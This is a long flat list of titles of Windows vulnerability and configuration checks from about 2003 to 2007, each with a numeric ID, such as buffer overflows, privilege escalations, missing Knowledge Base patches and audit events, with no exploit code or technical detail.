Microsoft Windows Virtual DOS Machine (VDM) VdmpInitialize privilege escalation [33916] Microsoft Windows Knowledge Base Article 934233 update not installed [33909] Microsoft Windows Knowledge Base Article 934873 update not installed [33902] Microsoft Windows Knowledge Base Article 934232 update not installed [33891] Microsoft Windows Knowledge Base Article 931832 update not installed [33667] Microsoft Windows unspecified buffer overflow [33473] Microsoft Windows dynamic DNS update unauthorized access [33410] Microsoft Windows Vista LLTD Mapper host spoofing [33409] Microsoft Windows Vista LLTD Mapper bridge spoofing [33401] Microsoft Windows Vista LLTD Responder host spoofing [33399] Microsoft Windows Vista LLTD Mapper denial of service [33398] Microsoft Windows Vista Teredo address weak security [33396] Microsoft Windows Vista Meeting Space weak security [33395] Microsoft Windows Vista nonce spoofing [33394] Microsoft Windows Vista Neighbor Advertisements spoofing [33393] Microsoft Windows Vista ARP denial of service [33301] Microsoft Windows animated cursor (ANI) buffer overflow [33300] Microsoft Windows Vista atikmdag.sys slideshow denial of service [33272] Microsoft Windows Vista CSRSS CsrFinalizeContext privilege escalation [33271] Microsoft Windows Knowledge Base Article 931784 update not installed [33270] Microsoft Windows kernel VDM mapped memory privilege escalation [33269] Microsoft Windows Knowledge Base Article 931261 update not installed [33268] Microsoft Windows Universal Plug and Play HTTP buffer overflow [33267] Microsoft Windows Knowledge Base Article 932168 update not installed [33266] Microsoft Windows Knowledge Base Article 925902 update not installed [33264] Microsoft Windows TrueType Fonts rasterizer privilege escalation [33263] Microsoft Windows GDI color parameter buffer overflow [33261] Microsoft Windows GDI window size privilege escalation [33259] Microsoft Windows GDI EMF image buffer overflow [33258] Microsoft Windows GDI WMF image denial of service [33257] Microsoft Windows Knowledge Base Article 931768 update not installed [33244] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) information disclosure [33225] Microsoft Windows Media File Format ASF multiple buffer overflows [33167] Microsoft Windows Vista Mail Client code execution [33118] Microsoft Windows XP winmm.dll denial of service [33117] Microsoft Windows MFC AfxOleSetEditMenu() buffer overflow [33086] Microsoft Windows Ndistapi.sys driver denial of service [33037] Microsoft Windows Explorer WMF file denial of service [32921] Microsoft Windows ole32.dll library denial of service [32808] Microsoft Windows Shell User Logon ActiveX control shgina.dll unauthorized access [32740] Microsoft Windows Knowledge Base Article 931906 update not installed [32738] Microsoft Windows Knowledge Base Article 925939 update not installed [32644] Microsoft Windows ReadDirectoryChangesW information disclosure [32419] Microsoft Windows Knowledge Base Article 932554 update not installed [32394] Microsoft Windows Mobile Internet Explorer WML page denial of service [32282] Microsoft Windows Knowledge Base Article 927802 update not installed [32280] Microsoft Windows Image Acquisition service buffer overflow [32153] Microsoft Windows permanent password detected [32116] Microsoft Windows administrator password no expiration set [32111] Microsoft Windows Knowledge Base Article 928255 update not installed [32110] Microsoft Windows Knowledge Base Article 928843 update not installed [32109] Microsoft Windows HTML Help ActiveX control code execution [32108] Microsoft Windows shell new hardware detection privilege escalation [32107] Microsoft Windows Knowledge Base Article 928090 update not installed [32104] Microsoft Windows Knowledge Base Article 929434 update not installed [32090] Microsoft Windows Knowledge Base Article 927779 update not installed [32071] Microsoft Windows Explorer AVI file denial of service [32002] Microsoft Windows Mobile Pictures and Videos JPEG denial of service [32001] Microsoft Windows Mobile Internet Explorer unspecified denial of service [31845] Microsoft Windows user account never used [31844] Microsoft Windows guest user account unchanged [31843] Microsoft Windows built-in guest account enumerated [31842] Microsoft Windows user account password unchanged [31821] Microsoft Windows time zone update for year 2007 [31288] Microsoft Windows Knowledge Base Article 929969 update not installed [31264] Microsoft Windows Knowledge Base Article 930178 update not installed [31210] Microsoft Windows Knowledge Base Article 927198 update is not installed [31199] Microsoft Windows Knowledge Base Article 921585 update is not installed [31191] Microsoft Windows Knowledge Base Article 925938 update is not installed [31176] Microsoft Windows CSRSS NtRaiseHardError() information disclosure [31085] Microsoft Windows Workstation service NetrWkstaUserEnum denial of service [31018] Microsoft Windows CSRSS MessageBox function privilege escalation [31015] Microsoft Windows Explorer WMV file denial of service [31014] Microsoft Windows Media Player MIDI file denial of service [31008] Microsoft Windows XP directory weak permission [30757] Microsoft Windows Knowledge Base Article 926121 update not installed [30756] Microsoft Windows Remote Installation Service code execution [30717] Microsoft Windows Print Spooler denial of service [30610] Microsoft Windows Knowledge Base Article 926436 update not installed [30608] Microsoft Windows Knowledge Base Article 926255 update not installed [30607] Microsoft Windows file manifest privilege escalation [30606] Microsoft Windows Knowledge Base Article 926247 update not installed [30605] Microsoft Windows SNMP service buffer overflow [30604] Microsoft Windows Knowledge Base Article 925454 update not installed [30599] Microsoft Windows Knowledge Base Article 924667 update not installed [30598] Microsoft Windows and Visual Studio MFC components RTF code execution [30597] Microsoft Windows Knowledge Base Article 923723 update not installed [30595] Microsoft Windows Knowledge Base Article 923689 update not installed [30594] Microsoft Windows Media Player ASF processing buffer overflow [30593] Microsoft Windows Knowledge Base Article 918118 update not installed [30592] Microsoft Windows and Office Rich Edit components code execution [30591] Microsoft Windows Knowledge Base Article 925674 update not installed [30586] Microsoft Windows Media Player ASX playlist buffer overflow [30553] Microsoft Windows Live Messenger emoticon denial of service [30172] Microsoft Windows Knowledge Base Article 928088 update not installed [30042] Microsoft Windows GDI kernel privilege escalation [29954] Microsoft Windows Knowledge Base Article 923980 update not installed [29953] Microsoft Windows Client Service for NetWare (CSNW) denial of service [29952] Microsoft Windows Client Service for NetWare (CSNW) buffer overflow [29950] Microsoft Windows Knowledge Base Article 920213 update is not installed [29949] Microsoft Windows Knowledge Base Article 924270 update not installed [29948] Microsoft Windows Workstation service NetpManageIPCConnect buffer overflow [29943] Microsoft Windows Knowledge Base Article 923789 update not installed [29917] Microsoft Windows XP NAT Helper ipnathlp.dll denial of service [29546] Microsoft Windows 2000/2003 user logoff initiated [29545] Microsoft Windows 2000/2003 system time changed [29544] Microsoft Windows 2000/2003 system security access removed [29543] Microsoft Windows 2000/2003 security access granted [29542] Microsoft Windows 2000/2003 SAM notification package loaded [29541] Microsoft Windows 2000/2003 primary security token issued [29540] Microsoft Windows 2000/2003 user password reset successful [29539] Microsoft Windows 2000/2003 object indirectly accessed [29538] Microsoft Windows 2000/2003 object handle duplicated [29537] Microsoft Windows 2000/2003 logon with explicit credentials success [29536] Microsoft Windows 2000/2003 logon attempt using explicit credentials unsuccessful [29535] Microsoft Windows 2000/2003 IPSEC policy agent failed [29534] Microsoft Windows 2000/2003 IPSEC policy agent disabled [29533] Microsoft Windows 2000/2003 IPSEC policy agent changed [29532] Microsoft Windows 2000/2003 IKE security association established [29531] Microsoft Windows 2000/2003 IKE quick mode association ended [29530] Microsoft Windows 2000/2003 IKE main mode association ended [29529] Microsoft Windows 2000/2003 IKE association negotiation failed [29528] Microsoft Windows 2000/2003 IKE association peer authentication failed [29527] Microsoft Windows 2000/2003 IKE association failed invalid proposal [29526] Microsoft Windows 2000/2003 IKE association failed authentication parameters [29525] Microsoft Windows 2000/2003 DPAPI master key backup attempted [29524] Microsoft Windows 2000/2003 DPAPI key recovery attempted [29523] Microsoft Windows 2000/2003 DPAPI auditable data unprotected [29522] Microsoft Windows 2000/2003 administrative group security descriptor set [29521] Microsoft Windows 2000/2003 account name changed [29400] Microsoft Windows drmstor.dll denial of service [29373] Microsoft Windows SMB rename denial of service [29369] Microsoft Windows Knowledge Base Article 922819 update is not installed [29253] Microsoft Windows error report transmission detected [29243] Microsoft Windows Knowledge Base Article 924164 update is not installed [29236] Microsoft Windows Knowledge Base Article 924163 update is not installed [29229] Microsoft Windows Knowledge Base Article 923694 update not installed [29227] Microsoft Outlook Express Windows Address Book (WAB) buffer overflow [29226] Microsoft Windows Knowledge Base Article 924554 update is not installed [29214] Microsoft Windows Knowledge Base Article 922581 update is not installed [29211] Microsoft Windows Knowledge Base Article 924191 update is not installed [29208] Microsoft Windows Knowledge Base Article 924496 update is not installed [29205] Microsoft Windows Object Packager file extension spoofing code execution [29204] Microsoft Windows Knowledge Base Article 923414 update is not installed [29202] Microsoft Windows Knowledge Base Article 922760 update is not installed [29201] Microsoft Windows Knowledge Base Article 923191 update is not installed [29171] Microsoft Windows Knowledge Base Article 925486 update is not installed [28664] Microsoft Windows Knowledge Base Article 922770 update is not installed [28660] Microsoft Windows Knowledge Base Article 921503 update is not installed [28659] Microsoft Windows OLE Automation code execution [28656] Microsoft Windows Knowledge Base Article 924090 update not installed [28652] Microsoft Windows Knowledge Base Article 920685 update is not installed [28649] Microsoft Windows Knowledge Base Article 910729 update is not installed [28646] Microsoft Windows Knowledge Base Article 919007 update is not installed [28643] Microsoft Windows XP PGM buffer overflow [28600] Microsoft Windows winhlp32 HLP file unspecified code execution [28512] Microsoft Internet Explorer multiple Windows 2000 COM object denial of service [28474] Microsoft Windows PNG IHDR block denial of service [28336] Symantec VERITAS Backup Exec for Windows Server RPC interface buffer overflow [28281] Microsoft Windows WMF gdi32.dll denial of service [28240] Microsoft Windows DNS client data string buffer overflow [28183] Microsoft Windows gdiplus.dll denial of service [28045] Microsoft Windows Knowledge Base Article 918899 update is not installed [28028] Microsoft Windows Knowledge Base Article 922616 update is not installed [28027] Microsoft Windows Knowledge Base Article 922968 update is not installed [28024] Microsoft Windows Knowledge Base Article 921645 update is not installed [28022] Microsoft Windows Knowledge Base Article 920670 update is not installed [28020] Microsoft Windows Hyperlink Object Library (hlink.dll) buffer overflow [28019] Microsoft Windows Knowledge Base Article 920214 update is not installed [28018] Microsoft Windows Knowledge Base Article 921398 update is not installed [28017] Microsoft Windows Knowledge Base Article 920958 update is not installed [28016] Microsoft Windows kernel system inputs buffer overflow [28015] Microsoft Windows Knowledge Base Article 920683 update is not installed [28014] Microsoft Windows Winsock API buffer overflow [28013] Microsoft Windows DNS client buffer overflow [28012] Microsoft Windows Knowledge Base Article 917422 update is not installed [28011] Microsoft Windows kernel exception handling code execution [28009] Microsoft Windows kernel Winlogon privilege escalation [28008] Microsoft Windows Knowledge Base Article 917008 update is not installed [28005] Microsoft Windows 2000 Management Console (MMC) resource file cross-site scripting [28004] Microsoft Windows Knowledge Base Article 921883 update is not installed [28002] Microsoft Windows Server service buffer overflow [27999] Microsoft Windows SMB malformed PIPE denial of service [27832] Microsoft Windows ASN.1 Library HTTP NTLM buffer overflow [27567] Microsoft Windows explorer.exe Internet Shortcut (.url) denial of service [27562] Microsoft Windows Knowledge Base Article 915384 update is not installed [27554] Microsoft Windows Knowledge Base Article 917284 update is not installed [27467] Microsoft Windows Knowledge Base Article 917285 update is not installed [27417] Microsoft Windows Live Messenger contact list denial of service [26905] Microsoft Windows Knowledge Base Article 918547 update is not installed [26903] Microsoft Windows Knowledge Base Article 917336 update is not installed [26886] Microsoft Windows Knowledge Base Article 917953 update is not installed [26884] Microsoft Windows Knowledge Base Article 917736 update is not installed [26883] Microsoft Windows Knowledge Base Article 917537 update is not installed [26882] Microsoft Windows Knowledge Base Article 917344 update is not installed [26880] Microsoft Windows Knowledge Base Article 917159 update is not installed [26876] Microsoft Windows Knowledge Base Article 916281 update is not installed [26874] Microsoft Windows Knowledge Base Article 914389 update is not installed [26871] Microsoft Windows Knowledge Base Article 914388 update is not installed [26868] Microsoft Windows Knowledge Base Article 917734 update is not installed [26867] Microsoft Windows Knowledge Base Article 911280 update is not installed [26865] Microsoft Windows Knowledge Base Article 917283 update is not installed [26861] Microsoft Windows Knowledge Base Article 918439 update is not installed [26834] Microsoft Windows TCP/IP protocol driver buffer overflow [26830] Microsoft Windows SMB invalid handle denial of service [26823] Microsoft Windows DHCP Client buffer overflow [26820] Microsoft Windows SMB Server service information disclosure [26818] Microsoft Windows Mailslot Server driver buffer overflow [26815] Microsoft Windows Graphics Rendering Engine (GRE) WMF code execution [26814] Microsoft Windows RRAS RASMAN buffer overflow [26813] Microsoft Windows Knowledge Base Article 916768 update is not installed [26812] Microsoft Windows RRAS buffer overflow [26809] Microsoft Windows ART image rendering library buffer overflow [26805] Microsoft Windows JScript code execution [26788] Microsoft Windows Media Player PNG buffer overflow [26487] Microsoft Windows NTDLL.DLL improper DOS to NT path conversion [26166] Microsoft Windows Knowledge Base Article 912442 update is not installed [26161] Microsoft Windows Knowledge Base Article 916803 update is not installed [26156] Microsoft Windows Knowledge Base Article 913580 update is not installed [25794] Microsoft Windows Knowledge Base Article 917627 update is not installed [25792] Microsoft Windows Knowledge Base Article 911567 update is not installed [25629] Microsoft Windows Knowledge Base Article 912812 update is not installed [25626] Microsoft Windows Knowledge Base Article 911562 update is not installed [25625] Microsoft Windows Knowledge Base Article 908531 not installed [25598] Microsoft Windows XP Firewall .exe firewall bypass [25597] Microsoft Windows XP Firewall ADS filename:stream syntax application alert bypass [25573] Microsoft Windows winhlp32.exe .hlp embedded image buffer overflow [25554] Microsoft Windows Explorer COM object code execution [25535] Microsoft Outlook Express Windows Address Book file buffer overflow [25370] Microsoft Windows Knowledge Base Article 901190 not installed [25369] Microsoft Windows DNS recursive query denial of service [25366] Microsoft Windows Knowledge Base Article 905755 update is not installed [25365] Microsoft Windows Knowledge Base Article 914798 update is not installed [25364] Microsoft Windows Knowledge Base Article 914451 update is not installed [25363] Microsoft Windows Knowledge Base Article 905756 update is not installed [25361] Microsoft Windows Knowledge Base Article 905758 update is not installed [25360] Microsoft Windows Knowledge Base Article 905754 update is not installed [25359] Microsoft Windows Knowledge Base Article 905555 update is not installed [25358] Microsoft Windows Knowledge Base Article 905646 update is not installed [25357] Microsoft Windows Knowledge Base Article 905757 update is not installed [25342] Microsoft Windows Knowledge Base Article 905553 update is not installed [25261] Microsoft Windows Knowledge Base Article 913433 is not installed [24586] Microsoft Windows DNS client ATMA data record buffer overflow [24512] Microsoft Windows Knowledge Base Article 911565 update is not installed [24511] Microsoft Windows Knowledge Base Article 911564 update is not installed [24509] Microsoft Windows Knowledge Base Article 889167 update is not installed [24496] Microsoft Windows Knowledge Base Article 911927 update is not installed [24495] Microsoft Windows Knowledge Base Article 913446 update is not installed [24494] Microsoft Windows Knowledge Base Article 910620 update is not installed [24493] Microsoft Windows Media Player Plugin EMBED element buffer overflow [24492] Microsoft Windows and Office Korean IME privilege elevation [24489] Microsoft Windows IGMP v3 denial of service [24488] Microsoft Windows Media Player BMP image parsing service buffer overflow [24474] Microsoft Windows 2000 LDAP client accepts untrusted CA [24473] Microsoft Windows 2000 event ID 565 not logged [24472] Microsoft Windows 2000 Event ID 1704 records incorrect group policy settings [24471] Microsoft Windows VDM information disclosure [24463] Microsoft Windows XP &quot [24407] Microsoft Windows 2000 SECEDIT command fails to set ACLs correctly [24405] Microsoft Windows 2000 UPN credentials with trailing dot group policy bypass [24403] Microsoft Windows 2000 WideCharToMultiByte() incorrect Japanese character conversion [24402] Microsoft Windows 2000 Terminal Service client IP not logged [24400] Microsoft Windows 2000 domain authentication can be bypassed by a local administrator [24157] Microsoft Windows wireless ad-hoc network unauthorized access [24044] Microsoft Windows GRE ExtCreateRegion() and ExtEscape() WMF denial of service [23978] Microsoft Windows Knowledge Base Article 912919 update is not installed [23926] Microsoft Windows Knowledge Base Article 908523 update is not installed [23924] Microsoft Windows Knowledge Base Article 908519 update is not installed [23922] Microsoft Windows embedded Open Type Web font buffer overflow [23846] Microsoft Windows GDI32.DLL WMF image rendering code execution [23453] Microsoft Windows COM object as ActiveX control allows execution of code [23450] Microsoft Windows Knowledge Base Article 905915 update is not installed [23447] Microsoft Windows APC queue list could allow elevated privileges [23284] Microsoft Windows SynAttackProtect denial of service [22899] Microsoft Windows Knowledge Base Article 902412 update is not installed [22882] Microsoft Windows Knowledge Base Article 896424 update is not installed [22877] Microsoft Windows Metafile image format buffer overflow [22876] Microsoft Windows Metafile and Enhance Metafile buffer overflow [22524] Microsoft Windows XP Wireless Zero Configuration service information disclosure [22514] Microsoft Windows Knowledge Base Article 902400 update is not installed [22512] Microsoft Windows Knowledge Base Article 907245 update is not installed [22502] Microsoft Windows Knowledge Base Article 905749 update is not installed [22501] Microsoft Windows Knowledge Base Article 900725 update is not installed [22498] Microsoft Windows XP tftp.exe heap overflow [22495] Microsoft Windows Collaboration Data Objects buffer overflow [22492] Microsoft Windows Knowledge Base Article 904706 update is not installed [22480] Microsoft Windows DirectShow .AVI file code execution [22479] Microsoft Windows HTML in preview fields execute code [22478] Microsoft Windows .lnk properties execute code [22477] Microsoft Windows .lnk file execute code [22476] Microsoft Windows Distributed Transaction Coordinator message denial of service [22475] Microsoft Windows Distributed Transaction Coordinator TIP denial of service [22473] Microsoft Windows COM code execution [22204] Microsoft Windows keybd_event or SendKeys allows elevated privileges [22156] Microsoft Windows Knowledge Base Article 899589 update is not installed [22089] Microsoft Windows Registry Editor Utility concealment [21980] Microsoft Windows Registry Editor Utility concealment [21978] Microsoft Windows user32.dll component denial of service [21954] Microsoft Windows Remote Desktop Protocol mstlsapi.dll Man-in-the-Middle [21931] Microsoft Windows XP memory leak [21895] Microsoft Windows Msdds.dll object command execution [21704] Microsoft Windows Knowledge Base Article 896727 update is not installed [21700] Microsoft Windows Client Service for NetWare code execution [21626] Microsoft Windows PKINIT protocol obtain information [21625] Microsoft Windows kerberos message denial of service [21605] Microsoft Windows Knowledge Base Article 896423 update is not installed [21604] Microsoft Windows print spooler buffer overflow [21603] Microsoft Windows Knowledge Base Article 899588 update is not installed [21602] Microsoft Windows Plug and Play buffer overflow [21601] Microsoft Windows Knowledge Base Article 899591 update is not installed [21600] Microsoft Windows Knowledge Base Article 893756 update is not installed [21599] Microsoft Windows telephony service buffer overflow [21539] Microsoft Windows USB device driver buffer overflow [21407] Microsoft Windows RDP request denial of service [21355] Microsoft Windows Network Connection Manager denial of service [21345] Microsoft Windows 2000 Update Rollup 1 for Service Pack 4 has not been installed [21272] Microsoft Windows Knowledge Base Article 903672 update is not installed [21269] Microsoft Windows Knowledge Base Article 901214 update is not installed [21221] Microsoft Windows Color Management Module buffer overflow [21214] Microsoft Windows NTFS allows attacker to obtain information [20829] Microsoft Windows Step-by-Step Interactive Training bookmark link file buffer overflow [20826] Microsoft Windows Knowledge Base Article 896422 update is not installed [20825] Microsoft Windows Knowledge Base Article 896358 update is not installed [20823] Microsoft Windows Knowledge Base Article 890169 update is not installed [20822] Microsoft Windows Knowledge Base Article 883939 update is not installed [20821] Microsoft Windows compiled Help (.CHM) integer overflow [20820] Microsoft Windows Knowledge Base Article 896426 update is not installed [20818] Microsoft Windows WebClient Service buffer overflow [20815] Microsoft Windows SMB process gain access [20629] Multiple Microsoft Windows IPv6 LAND denial of service [20546] Microsoft Windows Media Player allows creation of malicious media files [20382] Microsoft Windows Knowledge Base Article 894320 update is not installed [20380] Microsoft Windows Web View command execution [20318] Microsoft Windows Knowledge Base Article 893086 update is not installed [20317] Microsoft Windows Knowledge Base Article 890923 update is not installed [20000] Microsoft Windows Knowledge Base Article 892944 update is not installed [19969] Multiple Microsoft Windows Server 2003 Edition printer driver denial of service [19965] Multiple Microsoft Windows Server 2003 Editions SMB redirector denial of service [19843] Microsoft Windows Knowledge Base Article 894549 update is not installed [19836] Microsoft Windows CSRSS gain control [19835] Microsoft Windows HTML Application Host command execution [19834] Microsoft Windows object buffer overflow [19832] Microsoft Windows access requests gain privileges [19830] Microsoft Windows font buffer overflow [19829] Microsoft Windows Message Queuing component buffer overflow [19819] Microsoft Windows Remote Desktop &quot [19727] Microsoft Windows 2000 GDI32.DLL denial of service [19593] Microsoft Windows LAND denial of service [19288] IBM DB2 running on Microsoft Windows obtain information [19270] Microsoft Windows PNG image buffer overflow [19220] Microsoft Windows registry key connection denial of service [19110] Microsoft Windows Hyperlink Object Library code execution [19109] Microsoft Windows OLE code execution [19105] Microsoft Windows COM files gain privileges [19103] Multiple Microsoft Windows TCP/IP denial of service [19101] Microsoft Windows Servers License Logging service code execution [19096] Microsoft Windows Media Player PNG buffer overflow [19093] Microsoft Windows named pipe information disclosure [19091] Microsoft Windows SharePoint Services and SharePoint Team Services cross-site scripting [19089] Microsoft Windows SMB code execution [18879] Microsoft Windows USER32.DLL ANI header overflow [18768] Microsoft Windows Knowledge Base Article 891711 update is not installed [18766] Microsoft Windows Knowledge Base Article 871250 update is not installed [18758] Microsoft Windows Indexing Service allows code execution [18678] Microsoft Windows winhlp32.exe buffer overflow [18668] Microsoft Windows LoadImage API buffer overflow [18667] Microsoft Windows ANI file zero rate number overflow denial of service [18587] Microsoft Windows Media Player ActiveX object reveals existence of files [18576] Microsoft Windows Media Player mp3 code execution [18507] Microsoft Windows XP SP2 subnet option allows access to firewall exceptions [18394] Microsoft Windows Knowledge Base Article 870763 update is not installed [18393] Microsoft Windows Knowledge Base Article 873339 update is not installed [18392] Microsoft Windows Knowledge Base Article 885249 update is not installed [18391] Microsoft Windows Knowledge Base Article 885835 update is not installed [18390] Microsoft Windows Knowledge Base Article 885836 update is not installed [18378] Microsoft Windows Icon image anomaly detected [18342] Microsoft Windows NT DHCP HardwareAddress code execution [18341] Microsoft Windows NT DHCP MachineName denial of service [18340] Microsoft Windows LSASS gain privileges [18339] Microsoft Windows kernel LPC interface gain privileges [18338] Microsoft Windows Word for Windows 6.0 Converter font code execution [18337] Microsoft Windows Word for Windows 6.0 Converter table code execution [18336] Microsoft Windows HyperTerminal session file buffer overflow [18314] Microsoft Windows Knowledge Base Article 889293 update is not installed [18208] Microsoft Windows logon screen saver allows elevated privileges [17864] Microsoft Windows XP Explorer WAV file denial of service [17711] Microsoft Windows XP SP2 sessmgr.exe firewall bypass [17663] Microsoft Windows MS04-029 patch is not installed [17662] Microsoft Windows MS04-037 patch is not installed [17661] Microsoft Windows MS04-036 patch is not installed [17660] Microsoft Windows MS04-035 patch is not installed [17659] Microsoft Windows MS04-034 patch is not installed [17658] Microsoft Windows MS04-032 patch is not installed [17657] Microsoft Windows NetDDE MS04-031 patch is not installed [17641] Microsoft Windows NNTP buffer overflow [17624] Microsoft Windows XP and Windows Server 2003 Compressed Folders buffer overflow [17621] Microsoft Windows 2003 SMTP service code execution [17560] Microsoft Windows 2000 and XP GDI library denial of service [17521] Microsoft Windows 2000 Service Pack 4 is not installed [17458] Microsoft Windows CE KDataStruct information disclosure [17457] Microsoft Windows XP Explorer.exe TIFF denial of service [17455] Microsoft Windows XP information disclosure [17412] IBM with Microsoft Windows XP Professional has default administrator account [17341] Microsoft Windows MS04-028 patch is not installed [17052] Microsoft Windows XP and Internet Explorer displays improper file icon [17051] Microsoft Windows XP Content-Location bypass Local Computer zone restrictions [17023] Microsoft Windows XP Windows Explorer bypass Zone Identifier (ZoneID) feature [17009] Microsoft Windows XP ICF bypass filter [17004] Microsoft Windows XP Service Pack 2 is not installed on the system [16913] Microsoft Windows 2003 users with Synchronize directory service data privilege [16912] Microsoft Windows 2003 groups with Synchronize directory service data privilege [16909] Microsoft Windows 2003 groups with Remove computer from docking station privilege [16907] Microsoft Windows 2003 users with Create global objects privilege [16905] Microsoft Windows 2003 users or groups with Create global objects privilege [16851] Microsoft Windows 2003 and XP WinKey and U key denial of service [16704] Microsoft Windows 2000 Media Player control code execution [16664] Microsoft Windows Program Group Converter buffer overflow [16627] Microsoft Windows System32 write file to the directory has been detected [16597] Microsoft Windows Windows Shell allows code execution [16592] Microsoft Windows Utility Manager gain privileges [16591] Microsoft Windows Task Scheduler buffer overflow [16590] Microsoft Windows POSIX buffer overflow allows local attacker to gain privileges [16587] Microsoft Windows Network Dynamic Data Exchange Running [16586] Microsoft Windows HTML Help could allow execution of code [16582] Microsoft Windows Server 2003 kernel CPU denial of service [16581] Microsoft Windows Enhanced Metafile (EMF) buffer overflow [16580] Microsoft Windows Virtual DOS Machine (VDM) allows elevated privileges [16579] Microsoft Windows Window Management API allows elevated privileges [16572] Microsoft Windows 2003 Users with Impersonate a client after authentication privilege [16570] Microsoft Windows 2003 Users with Create global objects privilege [16564] Microsoft Windows 2003 Groups with Create global objects privilege [16562] Microsoft Windows 2003 Groups with &quot [16556] Microsoft Windows NetDDE buffer overflow [16522] Microsoft Windows 2003 Impersonate a client after authentication privilege [16521] Microsoft Windows 2003 Deny Logon Through Terminal Services privilege [16520] Microsoft Windows 2003 Create global objects privilege [16362] Microsoft Windows XP Help Center and Support starts automatically [16304] Microsoft Windows JPEG buffer overflow [16276] Microsoft Windows 2000 Advanced Server fully qualified domain name security bypass [16270] Microsoft Windows IPSec filter bypass [16213] Microsoft Windows Local Security Authority buffer overflow exploit attempt detected [16211] Microsoft Windows Service Host buffer overflow exploit attempt detected [16210] Microsoft Windows Service Host buffer overflow exploit attempt detected [16207] Microsoft Windows kernel buffer overflow exploit attempt detected [16206] Microsoft Windows Command Shell buffer overflow exploit attempt detected [16171] Microsoft Windows XP Explorer code execution [16154] Microsoft Windows NT 4.0 TSE Security Patch denial of service [16095] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15956] Microsoft Windows long file share name buffer overflow [15818] Microsoft Windows MS04-011 patch is not installed [15813] Microsoft Windows MS04-014 patch is not installed [15811] Microsoft Windows MS04-012 patch is not installed [15715] Microsoft Windows Negotiate Security Software Provider buffer overflow [15714] Microsoft Windows Virtual DOS Machine allows elevated privileges [15713] Microsoft Windows ASN.1 double-free [15711] Microsoft Windows object identifier could be used to open network ports [15710] Microsoft Windows H.323 buffer overflow [15707] Microsoft Windows Local Descriptor Table allows privilege escalation [15704] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15702] Microsoft Windows winlogon buffer overflow [15700] Microsoft Windows 2000 Domain Controller LSASS LDAP message denial of service [15699] Microsoft Windows LSASS buffer overflow [15678] Microsoft Windows XP task creation allows privilege escalation [15632] Microsoft Windows 2000 Utility Manger allows privilege escalation [15589] Microsoft Windows allows elevated privileges [15507] Microsoft Windows XP Explorer wmf denial of service [15461] Microsoft Windows MS04-008 patch is not installed [15394] Microsoft Windows service running under non-built-in accounts has been detected [15284] Microsoft Windows XP Windows shell shimgvw.dll buffer overflow [15263] Microsoft Windows XP and 2000 Server kernel allows elevated privileges [15256] Microsoft Windows ASN.1 buffer overflow packet using NTLM has been detected [15255] Microsoft Windows ASN.1 buffer overflow packet using SMTP has been detected [15223] Microsoft Windows access violation or exception code has been detected [15218] Microsoft Windows command shell backdoor [15101] Microsoft Windows XP helpctr.exe cross-site scripting [15057] Microsoft Windows XP and Windows Server 2003 smbmount Linux client denial of service [15039] Microsoft Windows ASN.1 Library buffer overflow [15038] Microsoft Windows 2000 Server Windows Media Services denial of service [15037] Microsoft Windows Server 2003 WINS /GS flag denial of service [14924] Microsoft Windows XP folder containing HTML code and executable file code execution [13786] Microsoft Windows MS03-051 patch is not installed [13785] Microsoft Windows MS03-048 patch is not installed [13784] Microsoft Windows MS03-050 patch is not installed [13639] Microsoft Windows Workstation buffer overflow [13638] Microsoft Windows MS03-049 patch is not installed [13558] Microsoft Windows XP CommCtl32.dll could allow an attacker to execute code [13509] Microsoft Windows HTML Help could allow an attacker to gain privileges [13482] Microsoft Windows MS03-047 patch is not installed [13480] Microsoft Windows MS03-046 patch is not installed [13478] Microsoft Windows MS03-044 patch is not installed [13473] Microsoft Windows MS03-045 patch is not installed [13472] Microsoft Windows MS03-042 patch is not installed [13471] Microsoft Windows MS03-041 patch is not installed [13444] Microsoft Windows Non-English patched with MS03-045 denial of service in Sophos Anti-Virus [13424] Microsoft Windows User32.dll ListBox and ComboBox controls buffer overflow [13423] Microsoft Windows 2000 Local Troubleshooter ActiveX control buffer overflow [13422] Microsoft Windows Authenticode could allow an attacker to execute code [13420] Microsoft Windows HSC HCP protocol file buffer overflow [13413] Microsoft Windows Messenger Service popup buffer overflow [13412] Microsoft Windows MS03-043 patch is not installed [13407] Microsoft Windows 2000 Server mqsvc.exe MQLocateBegin packet buffer overflow [13385] Microsoft Windows Server 2003 &quot [13375] Microsoft Windows Media Player Dynamic HTML behaviors allows an attacker to execute code [13364] Microsoft Windows MS03-040 patch is not installed [13344] Microsoft Windows 98 flood of fragmented UDP packets causes denial of service [13342] Microsoft Windows PostThreadMessage API allows processes to be terminated without permission [13211] Microsoft Windows 2000 and XP URG memory leak [13183] Microsoft Windows service pack detected [13171] Microsoft Windows Server 2003 can allow attacker to bypass mechanism used to detect buffer overflows [13134] Microsoft Windows MS03-039 patch is not installed [13131] Microsoft Windows 2000 Message Queue Manager buffer overflow [13105] Microsoft Windows Update fails to notify users of updates when host-blocking is used [13095] Microsoft Windows auto update is disabled [13089] Microsoft Windows NetBIOS Name Service information disclosure [12903] Microsoft Windows command shell banner [12835] Microsoft Windows Pocket PC could allow an attacker to gain access [12762] Microsoft Windows NT 4.0 Q823803i patch RRAS denial of service [12724] Microsoft Windows Media Player ASF file could allow code execution [12701] Microsoft Windows NT 4.0 Server file management function denial of service [12652] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension POST request buffer overflow [12620] Microsoft Windows 2000 Server SMTP FILETIME denial of service [12544] Microsoft Windows Servers SMB packet buffer overflow [12543] Microsoft Windows 2000 Accessibility Utility Manager could allow an attacker to gain privileges [12533] Microsoft Windows MS03-010 patch is not installed [12521] Microsoft Windows Rundll32.exe overly long routine name buffer overflow [12493] Microsoft Windows Shell32.dll 2000 ShellExecute function buffer overflow [12489] Microsoft Windows 2000 Server Active Directory buffer overflow [12442] Microsoft Windows XP SP1 Windows shell desktop.ini buffer overflow [12440] Microsoft Windows Media Player ActiveX control could disclose sensitive information [12187] Microsoft Windows XP gethostbyaddr() denial of service [12128] Microsoft Windows 2000 and Windows NT MS03-019 patch is not installed [12092] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension buffer overflow [12048] Microsoft Windows 2000 and Windows Server 2003 LAN Manager hash creation enabled [11953] Microsoft Windows Media Player skin downloading could allow an attacker to execute code [11824] Microsoft Windows XP Service Control Manager (SCM) race condition [11822] Microsoft Windows regedit.exe command execution [11816] Microsoft Windows 2000 Terminal Services MSGINA.DLL insecure access permissions [11810] Microsoft Windows 